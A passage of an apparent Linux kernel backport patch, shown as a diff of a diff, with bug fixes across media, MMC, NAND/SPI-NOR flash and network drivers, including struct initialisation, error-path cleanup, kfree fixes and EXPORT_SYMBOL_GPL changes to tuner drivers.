+@@ -107,7 +107,7 @@ static void vpu_session_handle_frame_release(struct vpu_inst *inst, struct vpu_r
+ 		info.type = inst->out_format.type;
+ 		call_void_vop(inst, buf_done, &info);
+ 	} else if (inst->core->type == VPU_CORE_TYPE_DEC) {
+-		struct vpu_fs_info fs;
++		struct vpu_fs_info fs = { 0 };
+ 
+ 		vpu_iface_unpack_msg_data(inst->core, pkt, &fs);
+ 		call_void_vop(inst, event_notify, VPU_MSG_ID_FRAME_RELEASE, &fs);
+@@ -122,7 +122,7 @@ static void vpu_session_handle_input_done(struct vpu_inst *inst, struct vpu_rpc_
+ 
+ static void vpu_session_handle_pic_decoded(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_dec_pic_info info;
++	struct vpu_dec_pic_info info = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, (void *)&info);
+ 	call_void_vop(inst, get_one_frame, &info);
+@@ -130,7 +130,7 @@ static void vpu_session_handle_pic_decoded(struct vpu_inst *inst, struct vpu_rpc
+ 
+ static void vpu_session_handle_pic_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_dec_pic_info info;
++	struct vpu_dec_pic_info info = { 0 };
+ 	struct vpu_frame_info frame;
+ 
+ 	memset(&frame, 0, sizeof(frame));
+@@ -210,7 +210,7 @@ static int vpu_session_handle_msg(struct vpu_inst *inst, struct vpu_rpc_event *m
+ 		return -EINVAL;
+ 
+ 	msg_id = ret;
+-	dev_dbg(inst->dev, "[%d] receive event(0x%x)\n", inst->id, msg_id);
++	dev_dbg(inst->dev, "[%d] receive event(%s)\n", inst->id, vpu_id_name(msg_id));
+ 
+ 	for (i = 0; i < ARRAY_SIZE(handlers); i++) {
+ 		if (handlers[i].id == msg_id) {
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index a74953191c221..e5c8e1a753ccd 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -404,6 +404,11 @@ static int vpu_vb2_queue_setup(struct vb2_queue *vq,
+ 	for (i = 0; i < cur_fmt->num_planes; i++)
+ 		psize[i] = cur_fmt->sizeimage[i];
+ 
++	if (V4L2_TYPE_IS_OUTPUT(vq->type) && inst->state == VPU_CODEC_STATE_SEEK) {
++		vpu_trace(inst->dev, "reinit when VIDIOC_REQBUFS(OUTPUT, 0)\n");
++		call_void_vop(inst, release);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -688,9 +693,9 @@ int vpu_v4l2_close(struct file *file)
+ 		v4l2_m2m_ctx_release(inst->fh.m2m_ctx);
+ 		inst->fh.m2m_ctx = NULL;
+ 	}
++	call_void_vop(inst, release);
+ 	vpu_inst_unlock(inst);
+ 
+-	call_void_vop(inst, release);
+ 	vpu_inst_unregister(inst);
+ 	vpu_inst_put(inst);
+ 
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index 3071b61946c3b..e9a4f8abd21c5 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -1412,6 +1412,7 @@ static int mtk_jpeg_remove(struct platform_device *pdev)
+ {
+ 	struct mtk_jpeg_dev *jpeg = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&jpeg->job_timeout_work);
+ 	pm_runtime_disable(&pdev->dev);
+ 	video_unregister_device(jpeg->vdev);
+ 	v4l2_m2m_release(jpeg->m2m_dev);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c
+index 70b8383f7c8ec..a27a109d8d144 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_if.c
+@@ -226,10 +226,11 @@ static struct vdec_fb *vp9_rm_from_fb_use_list(struct vdec_vp9_inst
+ 		if (fb->base_y.va == addr) {
+ 			list_move_tail(&node->list,
+ 				       &inst->available_fb_node_list);
+-			break;
++			return fb;
+ 		}
+ 	}
+-	return fb;
++
++	return NULL;
+ }
+ 
+ static void vp9_add_to_fb_free_list(struct vdec_vp9_inst *inst,
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index 03f8d7cd8eddc..a81212c0ade9d 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -246,6 +246,7 @@ void vdec_msg_queue_deinit(struct vdec_msg_queue *msg_queue,
+ 			mtk_vcodec_mem_free(ctx, mem);
+ 
+ 		kfree(lat_buf->private_data);
++		lat_buf->private_data = NULL;
+ 	}
+ }
+ 
+@@ -312,6 +313,7 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 	err = mtk_vcodec_mem_alloc(ctx, &msg_queue->wdma_addr);
+ 	if (err) {
+ 		mtk_v4l2_err("failed to allocate wdma_addr buf");
++		msg_queue->wdma_addr.size = 0;
+ 		return -ENOMEM;
+ 	}
+ 	msg_queue->wdma_rptr_addr = msg_queue->wdma_addr.dma_addr;
+diff --git a/drivers/media/platform/qcom/venus/hfi_venus.c b/drivers/media/platform/qcom/venus/hfi_venus.c
+index 2ad40b3945b0b..8fc8f46dc3908 100644
+--- a/drivers/media/platform/qcom/venus/hfi_venus.c
++++ b/drivers/media/platform/qcom/venus/hfi_venus.c
+@@ -131,7 +131,6 @@ struct venus_hfi_device {
+ 
+ static bool venus_pkt_debug;
+ int venus_fw_debug = HFI_DEBUG_MSG_ERROR | HFI_DEBUG_MSG_FATAL;
+-static bool venus_sys_idle_indicator;
+ static bool venus_fw_low_power_mode = true;
+ static int venus_hw_rsp_timeout = 1000;
+ static bool venus_fw_coverage;
+@@ -454,7 +453,6 @@ static int venus_boot_core(struct venus_hfi_device *hdev)
+ 	void __iomem *wrapper_base = hdev->core->wrapper_base;
+ 	int ret = 0;
+ 
+-	writel(BIT(VIDC_CTRL_INIT_CTRL_SHIFT), cpu_cs_base + VIDC_CTRL_INIT);
+ 	if (IS_V6(hdev->core)) {
+ 		mask_val = readl(wrapper_base + WRAPPER_INTR_MASK);
+ 		mask_val &= ~(WRAPPER_INTR_MASK_A2HWD_BASK_V6 |
+@@ -465,6 +463,7 @@ static int venus_boot_core(struct venus_hfi_device *hdev)
+ 	writel(mask_val, wrapper_base + WRAPPER_INTR_MASK);
+ 	writel(1, cpu_cs_base + CPU_CS_SCIACMDARG3);
+ 
++	writel(BIT(VIDC_CTRL_INIT_CTRL_SHIFT), cpu_cs_base + VIDC_CTRL_INIT);
+ 	while (!ctrl_status && count < max_tries) {
+ 		ctrl_status = readl(cpu_cs_base + CPU_CS_SCIACMDARG0);
+ 		if ((ctrl_status & CPU_CS_SCIACMDARG0_ERROR_STATUS_MASK) == 4) {
+@@ -947,17 +946,12 @@ static int venus_sys_set_default_properties(struct venus_hfi_device *hdev)
+ 	if (ret)
+ 		dev_warn(dev, "setting fw debug msg ON failed (%d)\n", ret);
+ 
+-	/*
+-	 * Idle indicator is disabled by default on some 4xx firmware versions,
+-	 * enable it explicitly in order to make suspend functional by checking
+-	 * WFI (wait-for-interrupt) bit.
+-	 */
+-	if (IS_V4(hdev->core) || IS_V6(hdev->core))
+-		venus_sys_idle_indicator = true;
+-
+-	ret = venus_sys_set_idle_message(hdev, venus_sys_idle_indicator);
+-	if (ret)
+-		dev_warn(dev, "setting idle response ON failed (%d)\n", ret);
++	/* HFI_PROPERTY_SYS_IDLE_INDICATOR is not supported beyond 8916 (HFI V1) */
++	if (IS_V1(hdev->core)) {
++		ret = venus_sys_set_idle_message(hdev, false);
++		if (ret)
++			dev_warn(dev, "setting idle response ON failed (%d)\n", ret);
++	}
+ 
+ 	ret = venus_sys_set_power_control(hdev, venus_fw_low_power_mode);
+ 	if (ret)
+diff --git a/drivers/media/tuners/fc0011.c b/drivers/media/tuners/fc0011.c
+index eaa3bbc903d7e..3d3b54be29557 100644
+--- a/drivers/media/tuners/fc0011.c
++++ b/drivers/media/tuners/fc0011.c
+@@ -499,7 +499,7 @@ struct dvb_frontend *fc0011_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(fc0011_attach);
++EXPORT_SYMBOL_GPL(fc0011_attach);
+ 
+ MODULE_DESCRIPTION("Fitipower FC0011 silicon tuner driver");
+ MODULE_AUTHOR("Michael Buesch <m@bues.ch>");
+diff --git a/drivers/media/tuners/fc0012.c b/drivers/media/tuners/fc0012.c
+index 4429d5e8c5796..81e65acbdb170 100644
+--- a/drivers/media/tuners/fc0012.c
++++ b/drivers/media/tuners/fc0012.c
+@@ -495,7 +495,7 @@ err:
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(fc0012_attach);
++EXPORT_SYMBOL_GPL(fc0012_attach);
+ 
+ MODULE_DESCRIPTION("Fitipower FC0012 silicon tuner driver");
+ MODULE_AUTHOR("Hans-Frieder Vogt <hfvogt@gmx.net>");
+diff --git a/drivers/media/tuners/fc0013.c b/drivers/media/tuners/fc0013.c
+index 29dd9b55ff333..1006a2798eefc 100644
+--- a/drivers/media/tuners/fc0013.c
++++ b/drivers/media/tuners/fc0013.c
+@@ -608,7 +608,7 @@ struct dvb_frontend *fc0013_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(fc0013_attach);
++EXPORT_SYMBOL_GPL(fc0013_attach);
+ 
+ MODULE_DESCRIPTION("Fitipower FC0013 silicon tuner driver");
+ MODULE_AUTHOR("Hans-Frieder Vogt <hfvogt@gmx.net>");
+diff --git a/drivers/media/tuners/max2165.c b/drivers/media/tuners/max2165.c
+index 1c746bed51fee..1575ab94e1c8b 100644
+--- a/drivers/media/tuners/max2165.c
++++ b/drivers/media/tuners/max2165.c
+@@ -410,7 +410,7 @@ struct dvb_frontend *max2165_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(max2165_attach);
++EXPORT_SYMBOL_GPL(max2165_attach);
+ 
+ MODULE_AUTHOR("David T. L. Wong <davidtlwong@gmail.com>");
+ MODULE_DESCRIPTION("Maxim MAX2165 silicon tuner driver");
+diff --git a/drivers/media/tuners/mc44s803.c b/drivers/media/tuners/mc44s803.c
+index 0c9161516abdf..ed8bdf7ebd99d 100644
+--- a/drivers/media/tuners/mc44s803.c
++++ b/drivers/media/tuners/mc44s803.c
+@@ -356,7 +356,7 @@ error:
+ 	kfree(priv);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(mc44s803_attach);
++EXPORT_SYMBOL_GPL(mc44s803_attach);
+ 
+ MODULE_AUTHOR("Jochen Friedrich");
+ MODULE_DESCRIPTION("Freescale MC44S803 silicon tuner driver");
+diff --git a/drivers/media/tuners/mt2060.c b/drivers/media/tuners/mt2060.c
+index 322c806228a5a..da7e23c2689b8 100644
+--- a/drivers/media/tuners/mt2060.c
++++ b/drivers/media/tuners/mt2060.c
+@@ -440,7 +440,7 @@ struct dvb_frontend * mt2060_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mt2060_attach);
++EXPORT_SYMBOL_GPL(mt2060_attach);
+ 
+ static int mt2060_probe(struct i2c_client *client,
+ 			const struct i2c_device_id *id)
+diff --git a/drivers/media/tuners/mt2131.c b/drivers/media/tuners/mt2131.c
+index 37f50ff6c0bd2..eebc060883414 100644
+--- a/drivers/media/tuners/mt2131.c
++++ b/drivers/media/tuners/mt2131.c
+@@ -274,7 +274,7 @@ struct dvb_frontend * mt2131_attach(struct dvb_frontend *fe,
+ 	fe->tuner_priv = priv;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mt2131_attach);
++EXPORT_SYMBOL_GPL(mt2131_attach);
+ 
+ MODULE_AUTHOR("Steven Toth");
+ MODULE_DESCRIPTION("Microtune MT2131 silicon tuner driver");
+diff --git a/drivers/media/tuners/mt2266.c b/drivers/media/tuners/mt2266.c
+index 6136f20fa9b7f..2e92885a6bcb9 100644
+--- a/drivers/media/tuners/mt2266.c
++++ b/drivers/media/tuners/mt2266.c
+@@ -336,7 +336,7 @@ struct dvb_frontend * mt2266_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 	mt2266_calibrate(priv);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mt2266_attach);
++EXPORT_SYMBOL_GPL(mt2266_attach);
+ 
+ MODULE_AUTHOR("Olivier DANET");
+ MODULE_DESCRIPTION("Microtune MT2266 silicon tuner driver");
+diff --git a/drivers/media/tuners/mxl5005s.c b/drivers/media/tuners/mxl5005s.c
+index ab4c43df9d180..2a8b0ea5d0cd3 100644
+--- a/drivers/media/tuners/mxl5005s.c
++++ b/drivers/media/tuners/mxl5005s.c
+@@ -4116,7 +4116,7 @@ struct dvb_frontend *mxl5005s_attach(struct dvb_frontend *fe,
+ 	fe->tuner_priv = state;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(mxl5005s_attach);
++EXPORT_SYMBOL_GPL(mxl5005s_attach);
+ 
+ MODULE_DESCRIPTION("MaxLinear MXL5005S silicon tuner driver");
+ MODULE_AUTHOR("Steven Toth");
+diff --git a/drivers/media/tuners/qt1010.c b/drivers/media/tuners/qt1010.c
+index 3853a3d43d4f2..60931367b82ca 100644
+--- a/drivers/media/tuners/qt1010.c
++++ b/drivers/media/tuners/qt1010.c
+@@ -440,7 +440,7 @@ struct dvb_frontend * qt1010_attach(struct dvb_frontend *fe,
+ 	fe->tuner_priv = priv;
+ 	return fe;
+ }
+-EXPORT_SYMBOL(qt1010_attach);
++EXPORT_SYMBOL_GPL(qt1010_attach);
+ 
+ MODULE_DESCRIPTION("Quantek QT1010 silicon tuner driver");
+ MODULE_AUTHOR("Antti Palosaari <crope@iki.fi>");
+diff --git a/drivers/media/tuners/tda18218.c b/drivers/media/tuners/tda18218.c
+index 4ed94646116fa..7d8d84dcb2459 100644
+--- a/drivers/media/tuners/tda18218.c
++++ b/drivers/media/tuners/tda18218.c
+@@ -336,7 +336,7 @@ struct dvb_frontend *tda18218_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tda18218_attach);
++EXPORT_SYMBOL_GPL(tda18218_attach);
+ 
+ MODULE_DESCRIPTION("NXP TDA18218HN silicon tuner driver");
+ MODULE_AUTHOR("Antti Palosaari <crope@iki.fi>");
+diff --git a/drivers/media/tuners/xc2028.c b/drivers/media/tuners/xc2028.c
+index 69c2e1b99bf17..5a967edceca93 100644
+--- a/drivers/media/tuners/xc2028.c
++++ b/drivers/media/tuners/xc2028.c
+@@ -1512,7 +1512,7 @@ fail:
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(xc2028_attach);
++EXPORT_SYMBOL_GPL(xc2028_attach);
+ 
+ MODULE_DESCRIPTION("Xceive xc2028/xc3028 tuner driver");
+ MODULE_AUTHOR("Michel Ludwig <michel.ludwig@gmail.com>");
+diff --git a/drivers/media/tuners/xc4000.c b/drivers/media/tuners/xc4000.c
+index d59b4ab774302..57ded9ff3f043 100644
+--- a/drivers/media/tuners/xc4000.c
++++ b/drivers/media/tuners/xc4000.c
+@@ -1742,7 +1742,7 @@ fail2:
+ 	xc4000_release(fe);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(xc4000_attach);
++EXPORT_SYMBOL_GPL(xc4000_attach);
+ 
+ MODULE_AUTHOR("Steven Toth, Davide Ferri");
+ MODULE_DESCRIPTION("Xceive xc4000 silicon tuner driver");
+diff --git a/drivers/media/tuners/xc5000.c b/drivers/media/tuners/xc5000.c
+index 7b7d9fe4f9453..2182e5b7b6064 100644
+--- a/drivers/media/tuners/xc5000.c
++++ b/drivers/media/tuners/xc5000.c
+@@ -1460,7 +1460,7 @@ fail:
+ 	xc5000_release(fe);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(xc5000_attach);
++EXPORT_SYMBOL_GPL(xc5000_attach);
+ 
+ MODULE_AUTHOR("Steven Toth");
+ MODULE_DESCRIPTION("Xceive xc5000 silicon tuner driver");
+diff --git a/drivers/media/usb/dvb-usb/m920x.c b/drivers/media/usb/dvb-usb/m920x.c
+index 548199cd86f60..11f4f0455f155 100644
+--- a/drivers/media/usb/dvb-usb/m920x.c
++++ b/drivers/media/usb/dvb-usb/m920x.c
+@@ -277,7 +277,6 @@ static int m920x_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int nu
+ 			char *read = kmalloc(1, GFP_KERNEL);
+ 			if (!read) {
+ 				ret = -ENOMEM;
+-				kfree(read);
+ 				goto unlock;
+ 			}
+ 
+@@ -288,8 +287,10 @@ static int m920x_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int nu
+ 
+ 				if ((ret = m920x_read(d->udev, M9206_I2C, 0x0,
+ 						      0x20 | stop,
+-						      read, 1)) != 0)
++						      read, 1)) != 0) {
++					kfree(read);
+ 					goto unlock;
++				}
+ 				msg[i].buf[j] = read[0];
+ 			}
+ 
+diff --git a/drivers/media/usb/go7007/go7007-i2c.c b/drivers/media/usb/go7007/go7007-i2c.c
+index 38339dd2f83f7..2880370e45c8b 100644
+--- a/drivers/media/usb/go7007/go7007-i2c.c
++++ b/drivers/media/usb/go7007/go7007-i2c.c
+@@ -165,8 +165,6 @@ static int go7007_i2c_master_xfer(struct i2c_adapter *adapter,
+ 		} else if (msgs[i].len == 3) {
+ 			if (msgs[i].flags & I2C_M_RD)
+ 				return -EIO;
+-			if (msgs[i].len != 3)
+-				return -EIO;
+ 			if (go7007_i2c_xfer(go, msgs[i].addr, 0,
+ 					(msgs[i].buf[0] << 8) | msgs[i].buf[1],
+ 					0x01, &msgs[i].buf[2]) < 0)
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index 640737d3b8aeb..8a39cac76c585 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -455,12 +455,7 @@ static int smsusb_init_device(struct usb_interface *intf, int board_id)
+ 	rc = smscore_register_device(&params, &dev->coredev, 0, mdev);
+ 	if (rc < 0) {
+ 		pr_err("smscore_register_device(...) failed, rc %d\n", rc);
+-		smsusb_term_device(intf);
+-#ifdef CONFIG_MEDIA_CONTROLLER_DVB
+-		media_device_unregister(mdev);
+-#endif
+-		kfree(mdev);
+-		return rc;
++		goto err_unregister_device;
+ 	}
+ 
+ 	smscore_set_board_id(dev->coredev, board_id);
+@@ -477,8 +472,7 @@ static int smsusb_init_device(struct usb_interface *intf, int board_id)
+ 	rc = smsusb_start_streaming(dev);
+ 	if (rc < 0) {
+ 		pr_err("smsusb_start_streaming(...) failed\n");
+-		smsusb_term_device(intf);
+-		return rc;
++		goto err_unregister_device;
+ 	}
+ 
+ 	dev->state = SMSUSB_ACTIVE;
+@@ -486,13 +480,20 @@ static int smsusb_init_device(struct usb_interface *intf, int board_id)
+ 	rc = smscore_start_device(dev->coredev);
+ 	if (rc < 0) {
+ 		pr_err("smscore_start_device(...) failed\n");
+-		smsusb_term_device(intf);
+-		return rc;
++		goto err_unregister_device;
+ 	}
+ 
+ 	pr_debug("device 0x%p created\n", dev);
+ 
+ 	return rc;
++
++err_unregister_device:
++	smsusb_term_device(intf);
++#ifdef CONFIG_MEDIA_CONTROLLER_DVB
++	media_device_unregister(mdev);
++#endif
++	kfree(mdev);
++	return rc;
+ }
+ 
+ static int smsusb_probe(struct usb_interface *intf,
+diff --git a/drivers/media/v4l2-core/v4l2-fwnode.c b/drivers/media/v4l2-core/v4l2-fwnode.c
+index 3d85a8600f576..69c8b3b656860 100644
+--- a/drivers/media/v4l2-core/v4l2-fwnode.c
++++ b/drivers/media/v4l2-core/v4l2-fwnode.c
+@@ -551,19 +551,29 @@ int v4l2_fwnode_parse_link(struct fwnode_handle *fwnode,
+ 	link->local_id = fwep.id;
+ 	link->local_port = fwep.port;
+ 	link->local_node = fwnode_graph_get_port_parent(fwnode);
++	if (!link->local_node)
++		return -ENOLINK;
+ 
+ 	fwnode = fwnode_graph_get_remote_endpoint(fwnode);
+-	if (!fwnode) {
+-		fwnode_handle_put(fwnode);
+-		return -ENOLINK;
+-	}
++	if (!fwnode)
++		goto err_put_local_node;
+ 
+ 	fwnode_graph_parse_endpoint(fwnode, &fwep);
+ 	link->remote_id = fwep.id;
+ 	link->remote_port = fwep.port;
+ 	link->remote_node = fwnode_graph_get_port_parent(fwnode);
++	if (!link->remote_node)
++		goto err_put_remote_endpoint;
+ 
+ 	return 0;
++
++err_put_remote_endpoint:
++	fwnode_handle_put(fwnode);
++
++err_put_local_node:
++	fwnode_handle_put(link->local_node);
++
++	return -ENOLINK;
+ }
+ EXPORT_SYMBOL_GPL(v4l2_fwnode_parse_link);
+ 
+diff --git a/drivers/mmc/host/renesas_sdhi_core.c b/drivers/mmc/host/renesas_sdhi_core.c
+index e38d0e8b8e0ed..7572c5714b469 100644
+--- a/drivers/mmc/host/renesas_sdhi_core.c
++++ b/drivers/mmc/host/renesas_sdhi_core.c
+@@ -1006,6 +1006,8 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 		host->sdcard_irq_setbit_mask = TMIO_STAT_ALWAYS_SET_27;
+ 		host->sdcard_irq_mask_all = TMIO_MASK_ALL_RCAR2;
+ 		host->reset = renesas_sdhi_reset;
++	} else {
++		host->sdcard_irq_mask_all = TMIO_MASK_ALL;
+ 	}
+ 
+ 	/* Orginally registers were 16 bit apart, could be 32 or 64 nowadays */
+@@ -1102,9 +1104,7 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 		host->ops.hs400_complete = renesas_sdhi_hs400_complete;
+ 	}
+ 
+-	ret = tmio_mmc_host_probe(host);
+-	if (ret < 0)
+-		goto edisclk;
++	sd_ctrl_write32_as_16_and_16(host, CTL_IRQ_MASK, host->sdcard_irq_mask_all);
+ 
+ 	num_irqs = platform_irq_count(pdev);
+ 	if (num_irqs < 0) {
+@@ -1131,6 +1131,10 @@ int renesas_sdhi_probe(struct platform_device *pdev,
+ 			goto eirq;
+ 	}
+ 
++	ret = tmio_mmc_host_probe(host);
++	if (ret < 0)
++		goto edisclk;
++
+ 	dev_info(&pdev->dev, "%s base at %pa, max clock rate %u MHz\n",
+ 		 mmc_hostname(host->mmc), &res->start, host->mmc->f_max / 1000000);
+ 
+diff --git a/drivers/mtd/nand/raw/brcmnand/brcmnand.c b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+index 2e9c2e2d9c9f7..d8418d7fcc372 100644
+--- a/drivers/mtd/nand/raw/brcmnand/brcmnand.c
++++ b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+@@ -2612,6 +2612,8 @@ static int brcmnand_setup_dev(struct brcmnand_host *host)
+ 	struct nand_chip *chip = &host->chip;
+ 	const struct nand_ecc_props *requirements =
+ 		nanddev_get_ecc_requirements(&chip->base);
++	struct nand_memory_organization *memorg =
++		nanddev_get_memorg(&chip->base);
+ 	struct brcmnand_controller *ctrl = host->ctrl;
+ 	struct brcmnand_cfg *cfg = &host->hwcfg;
+ 	char msg[128];
+@@ -2633,10 +2635,11 @@ static int brcmnand_setup_dev(struct brcmnand_host *host)
+ 	if (cfg->spare_area_size > ctrl->max_oob)
+ 		cfg->spare_area_size = ctrl->max_oob;
+ 	/*
+-	 * Set oobsize to be consistent with controller's spare_area_size, as
+-	 * the rest is inaccessible.
++	 * Set mtd and memorg oobsize to be consistent with controller's
++	 * spare_area_size, as the rest is inaccessible.
+ 	 */
+ 	mtd->oobsize = cfg->spare_area_size * (mtd->writesize >> FC_SHIFT);
++	memorg->oobsize = mtd->oobsize;
+ 
+ 	cfg->device_size = mtd->size;
+ 	cfg->block_size = mtd->erasesize;
+diff --git a/drivers/mtd/nand/raw/fsmc_nand.c b/drivers/mtd/nand/raw/fsmc_nand.c
+index 6b2bda815b880..17786e1331e6d 100644
+--- a/drivers/mtd/nand/raw/fsmc_nand.c
++++ b/drivers/mtd/nand/raw/fsmc_nand.c
+@@ -1202,9 +1202,14 @@ static int fsmc_nand_suspend(struct device *dev)
+ static int fsmc_nand_resume(struct device *dev)
+ {
+ 	struct fsmc_nand_data *host = dev_get_drvdata(dev);
++	int ret;
+ 
+ 	if (host) {
+-		clk_prepare_enable(host->clk);
++		ret = clk_prepare_enable(host->clk);
++		if (ret) {
++			dev_err(dev, "failed to enable clk\n");
++			return ret;
++		}
+ 		if (host->dev_timings)
+ 			fsmc_nand_setup(host, host->dev_timings);
+ 		nand_reset(&host->nand, 0);
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index dc4d86ceee447..a9000b0ebe690 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -770,21 +770,22 @@ static int spi_nor_write_16bit_sr_and_check(struct spi_nor *nor, u8 sr1)
+ 		ret = spi_nor_read_cr(nor, &sr_cr[1]);
+ 		if (ret)
+ 			return ret;
+-	} else if (nor->params->quad_enable) {
++	} else if (spi_nor_get_protocol_width(nor->read_proto) == 4 &&
++		   spi_nor_get_protocol_width(nor->write_proto) == 4 &&
++		   nor->params->quad_enable) {
+ 		/*
+ 		 * If the Status Register 2 Read command (35h) is not
+ 		 * supported, we should at least be sure we don't
+ 		 * change the value of the SR2 Quad Enable bit.
+ 		 *
+-		 * We can safely assume that when the Quad Enable method is
+-		 * set, the value of the QE bit is one, as a consequence of the
+-		 * nor->params->quad_enable() call.
++		 * When the Quad Enable method is set and the buswidth is 4, we
++		 * can safely assume that the value of the QE bit is one, as a
++		 * consequence of the nor->params->quad_enable() call.
+ 		 *
+-		 * We can safely assume that the Quad Enable bit is present in
+-		 * the Status Register 2 at BIT(1). According to the JESD216
+-		 * revB standard, BFPT DWORDS[15], bits 22:20, the 16-bit
+-		 * Write Status (01h) command is available just for the cases
+-		 * in which the QE bit is described in SR2 at BIT(1).
++		 * According to the JESD216 revB standard, BFPT DWORDS[15],
++		 * bits 22:20, the 16-bit Write Status (01h) command is
++		 * available just for the cases in which the QE bit is
++		 * described in SR2 at BIT(1).
+ 		 */
+ 		sr_cr[1] = SR2_QUAD_EN_BIT1;
+ 	} else {
+diff --git a/drivers/net/arcnet/arcnet.c b/drivers/net/arcnet/arcnet.c
+index 1bad1866ae462..a48220f91a2df 100644
+--- a/drivers/net/arcnet/arcnet.c
++++ b/drivers/net/arcnet/arcnet.c
+@@ -468,7 +468,7 @@ static void arcnet_reply_tasklet(struct tasklet_struct *t)
+ 
+ 	ret = sock_queue_err_skb(sk, ackskb);
+ 	if (ret)
+-		kfree_skb(ackskb);
++		dev_kfree_skb_irq(ackskb);
+ 
+ 	local_irq_enable();
+ };
+diff --git a/drivers/net/can/usb/gs_usb.c b/drivers/net/can/usb/gs_usb.c
+index 5858cbafbc965..264a0f764e011 100644
+--- a/drivers/net/can/usb/gs_usb.c
++++ b/drivers/net/can/usb/gs_usb.c
+@@ -626,6 +626,9 @@ static void gs_usb_receive_bulk_callback(struct urb *urb)
+ 	}
+ 
+ 	if (hf->flags & GS_CAN_FLAG_OVERFLOW) {
++		stats->rx_over_errors++;
++		stats->rx_errors++;
++
+ 		skb = alloc_can_err_skb(netdev, &cf);
+ 		if (!skb)
+ 			goto resubmit_urb;
+@@ -633,8 +636,6 @@ static void gs_usb_receive_bulk_callback(struct urb *urb)
+ 		cf->can_id |= CAN_ERR_CRTL;
+ 		cf->len = CAN_ERR_DLC;
+ 		cf->data[1] = CAN_ERR_CRTL_RX_OVERFLOW;
+-		stats->rx_over_errors++;
+-		stats->rx_errors++;
+ 		netif_rx(skb);
+ 	}
+ 
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 8c492d56d2c36..dc9eea3c8ab16 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -590,10 +590,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x1030, 0x1030),
+ 	regmap_reg_range(0x1100, 0x1115),
+ 	regmap_reg_range(0x111a, 0x111f),
+-	regmap_reg_range(0x1122, 0x1127),
+-	regmap_reg_range(0x112a, 0x112b),
+-	regmap_reg_range(0x1136, 0x1139),
+-	regmap_reg_range(0x113e, 0x113f),
++	regmap_reg_range(0x1120, 0x112b),
++	regmap_reg_range(0x1134, 0x113b),
++	regmap_reg_range(0x113c, 0x113f),
+ 	regmap_reg_range(0x1400, 0x1401),
+ 	regmap_reg_range(0x1403, 0x1403),
+ 	regmap_reg_range(0x1410, 0x1417),
+@@ -624,10 +623,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x2030, 0x2030),
+ 	regmap_reg_range(0x2100, 0x2115),
+ 	regmap_reg_range(0x211a, 0x211f),
+-	regmap_reg_range(0x2122, 0x2127),
+-	regmap_reg_range(0x212a, 0x212b),
+-	regmap_reg_range(0x2136, 0x2139),
+-	regmap_reg_range(0x213e, 0x213f),
++	regmap_reg_range(0x2120, 0x212b),
++	regmap_reg_range(0x2134, 0x213b),
++	regmap_reg_range(0x213c, 0x213f),
+ 	regmap_reg_range(0x2400, 0x2401),
+ 	regmap_reg_range(0x2403, 0x2403),
+ 	regmap_reg_range(0x2410, 0x2417),
+@@ -658,10 +656,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
